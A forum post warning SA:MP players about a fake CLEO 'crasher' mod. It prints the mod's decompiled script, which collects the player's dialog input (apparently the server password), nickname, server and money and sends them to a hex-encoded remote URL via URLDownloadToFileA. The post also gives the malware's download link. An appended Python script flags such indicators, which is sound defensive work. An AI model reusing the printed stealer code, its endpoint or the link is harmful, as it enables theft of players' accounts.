blackHat
Hello, I'm reporting a fake CLEO, I think, and it is installing a virus/keylogger on your system.
This is the link > Don't use it!! > http://wikisend.com/download/417512/crasher.cs
I got the crasher from beatc by PM; he was asking me for the activation keys.
Well, it was encrypted, but I could decrypt it xD. It is auto-active anyway.
OK, now this is the code:
Code:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
//-------------MAIN---------------
0000: NOP
if
29@ = SAMP.Base()
else_jump @Noname_35
0A93: end_custom_thread
not SAMP.Available
else_jump @Noname_55
wait 100
jump @Noname_35
13@ = 13
wait 0
if
:Noname_55
SAMP.IsDialogActive(-1)
else_jump @Noname_442
0@ = SAMP.GetDialogType()
if or
0@ == 3
0@ == 1
else_jump @Noname_442
12@ = SAMP.GetDialogID()
wait 0
not SAMP.IsDialogActive(12@)
else_jump @Noname_116
alloc 7@ 516
alloc 4@ 32
alloc 11@ 100
alloc 20@ 32
SAMP.ShowDialog(17, "", "", ".", "", DIALOG_STYLE_MSGBOX)
SAMP.CloseDialog(1)
SAMP.DialogRespond(-1, 0, 0, 20@)
0AC6: 1@ = label @Noname_449 offset
10@ = SAMP.GetSAMPPlayerIDByActorHandle($PLAYER_ACTOR)
2@ = SAMP.GetPlayerNickname(10@)
3@ = Player.Money($PLAYER_CHAR)
SAMP.GetCurrentServerAddress(4@, 5@)
11@ = SAMP.GetCurrentServerName()
format 7@ "%slog=%s&srvr=%s:%d&inf=%s&mn=%d&servname=%s&did=%d&stuid=%d" 1@ 2@ 4@ 5@ 20@ 3@ 11@ 12@ 13@
0AA2: 8@ = load_library "urlmon.dll" // IF and SET
0AA4: 9@ = get_proc_address "URLDownloadToFileA" library 8@ // IF and SET
0AA5: call 9@ num_params 5 pop 0 0 0 "%TEMP%\2352sfe.tmp" 7@ 0
free 7@
free 4@
free 11@
free 20@
0AA3: free_library 8@
jump @Noname_62
hex
68 74 74 70 3A 2F 2F 6B 61 74 2E 63 6D 68 6F 73
74 2E 72 75 2F 61 64 64 2E 70 68 70 3F 00
end
This is a virus. Yes, I think it is fake and downloads a virus onto your PC.
If you noticed this code
Code:
11@ = SAMP.GetCurrentServerName()
format 7@ "%slog=%s&srvr=%s:%d&inf=%s&mn=%d&servname=%s&did=%d&stuid=%d" 1@ 2@ 4@ 5@ 20@ 3@ 11@ 12@ 13@
0AA2: 8@ = load_library "urlmon.dll" // IF and SET
0AA4: 9@ = get_proc_address "URLDownloadToFileA" library 8@ // IF and SET
0AA5: call 9@ num_params 5 pop 0 0 0 "%TEMP%\2352sfe.tmp" 7@ 0
you will know that this will download a virus/keylogger onto your system, and it's called >> 2352sfe.tmp <<. I think it is located in user/yourPCname/AppData/Temp/
----
I wish you guys didn't use it before. If you did, you should do a full scan with at least 2 antiviruses to locate the virus and delete it!
Please, anyone who is up and active and knows CLEO coding, confirm whether this is right!
Others' thoughts and beliefs:
springfield: not a virus, not a crasher, steals SA:MP password.
Thanks for reading my report.
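
An added example, not part of the original post: a small Python triage script for decompiled CLEO text that lists the `urlmon.dll` / `URLDownloadToFileA` references, query-string templates, `%TEMP%` paths, and any URL stored in a `hex ... end` block. The sample input is constructed from the opcode lines quoted above plus a placeholder URL (`example.invalid`); the function names `decode_hex_blocks` and `triage` are assumptions of this example.

```python
import re

# Library/API names whose presence in a decompiled CLEO script deserves review.
# Both appear in the script quoted in the post.
SUSPICIOUS = ("urlmon.dll", "URLDownloadToFileA")
HEX_BLOCK = re.compile(r"^hex\s*$(.*?)^end\s*$", re.M | re.S)
STRING_LIT = re.compile(r'"([^"]*)"')


def decode_hex_blocks(text):
    """Return printable NUL-terminated strings found in `hex ... end` blocks."""
    out = []
    for body in HEX_BLOCK.findall(text):
        pairs = re.findall(r"\b[0-9A-Fa-f]{2}\b", body)
        raw = bytes(int(p, 16) for p in pairs)
        for chunk in raw.split(b"\x00"):
            if len(chunk) >= 4 and all(0x20 <= b < 0x7F for b in chunk):
                out.append(chunk.decode("ascii"))
    return out


def triage(text):
    """Summarise network-related indicators in decompiled CLEO text."""
    literals = STRING_LIT.findall(text)
    return {
        "api_hits": [s for s in SUSPICIOUS if any(s in lit for lit in literals)],
        "query_templates": [lit for lit in literals if "=%" in lit and "&" in lit],
        "temp_writes": [lit for lit in literals if lit.upper().startswith("%TEMP%")],
        "embedded_urls": [s for s in decode_hex_blocks(text)
                          if s.lower().startswith(("http://", "https://"))],
    }


# Constructed sample: opcode lines copied from the post, hex block built from a placeholder URL.
_hex = " ".join(f"{b:02X}" for b in b"http://example.invalid/add.php?\x00")
SAMPLE = "\n".join([
    'format 7@ "%slog=%s&srvr=%s:%d&inf=%s&mn=%d&servname=%s&did=%d&stuid=%d" 1@ 2@ 4@ 5@ 20@ 3@ 11@ 12@ 13@',
    '0AA2: 8@ = load_library "urlmon.dll" // IF and SET',
    '0AA4: 9@ = get_proc_address "URLDownloadToFileA" library 8@ // IF and SET',
    r'0AA5: call 9@ num_params 5 pop 0 0 0 "%TEMP%\2352sfe.tmp" 7@ 0',
    "hex", _hex, "end",
])

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

A script that combines a query-string template, a `URLDownloadToFileA` lookup and a hex-encoded URL is worth reading line by line before it goes anywhere near a CLEO folder.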